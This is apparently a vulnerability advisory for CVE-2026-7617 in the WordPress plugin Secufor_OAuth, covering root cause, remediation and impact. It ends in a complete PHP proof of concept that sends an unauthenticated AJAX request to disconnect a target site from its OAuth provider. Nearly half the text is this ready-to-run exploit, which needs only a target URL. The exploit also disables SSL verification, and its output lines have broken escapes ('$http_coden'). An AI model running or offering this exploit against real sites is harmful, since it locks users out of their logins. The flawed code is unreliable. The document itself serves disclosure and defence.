Atomic Edge analysis of CVE-2026-7617 (metadata-based): This vulnerability is a Missing Authorization (CWE-862) issue in the Secufor_OAuth plugin (slug: wpoauth) up to version 1.0.7. The plugin fails to verify that a request to disconnect the site from its linked Secufor account is made by an authorized user. The CVSS score is 5.3 (medium), with a vector of AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N, indicating low integrity impact but no confidentiality or availability impact. The vulnerability is exploitable by any unauthenticated attacker with network access.
Root Cause: The plugin exposes a WordPress AJAX action, likely ‘secuforoauth_unregister_action’, which is registered via the admin-ajax.php endpoint. The description states the plugin does not properly verify that a user is authorized to perform the action. Based on the CWE classification (Missing Authorization), Atomic Edge analysis infers that the AJAX handler lacks a capability check (e.g., current_user_can()) and may also omit nonce verification, allowing remote unauthenticated execution. The handler directly clears stored login tokens and user login configuration, disconnecting the WordPress site from its Secufor OAuth service.
Exploitation: An attacker crafts a POST request to /wp-admin/admin-ajax.php with the action parameter set to ‘secuforoauth_unregister_action’. No authentication cookies or nonces are required. The request can be sent from any browser or script. The plugin processes the request and deletes the stored OAuth token and related configuration options from the WordPress database. This instantly severs the connection between the WordPress site and its Secufor account, disabling OAuth-based login for all users.
Remediation: The developer should add a capability check (e.g., current_user_can(‘manage_options’)) to the AJAX handler function. A nonce verification using check_ajax_referer() should also be implemented to prevent cross-site request forgery. Without source code access, Atomic Edge analysis cannot confirm whether a patched version exists; the metadata indicates no patched version is available as of the report date.
Impact: An unauthenticated attacker can disconnect the WordPress site from its Secufor OAuth provider. This disrupts the OAuth-based login mechanism, potentially locking out users who rely on Secufor credentials for authentication. The integrity impact is limited to the disconnection; no data is stolen or modified beyond the OAuth configuration.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-7617 - Secufor_OAuth <= 1.0.7 - Missing Authorization to Unauthenticated Account Logout via 'secuforoauth_unregister_action' AJAX Action
// This PoC exploits a missing authorization vulnerability in the Secufor_OAuth plugin.
// The AJAX action 'secuforoauth_unregister_action' lacks capability and nonce checks,
// allowing an unauthenticated attacker to disconnect the WordPress site from its Secufor account.
// Configuration: change this to the target WordPress site URL
$target_url = 'http://example.com'; // No trailing slash
// Step 1: Send the POST request to the vulnerable AJAX handler
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
'action' => 'secuforoauth_unregister_action'
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
// Disable SSL verification for testing (do not use in production)
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// Step 2: Analyze the response
if ($http_code === 200) {
// The plugin may return a success response or an empty response.
// A 200 status without errors suggests the action was processed.
echo "[+] Exploit sent successfully. HTTP Status: $http_coden";
echo "[+] The WordPress site should now be disconnected from its Secufor account.n";
} else {
echo "[-] Exploit failed. HTTP Status: $http_coden";
}
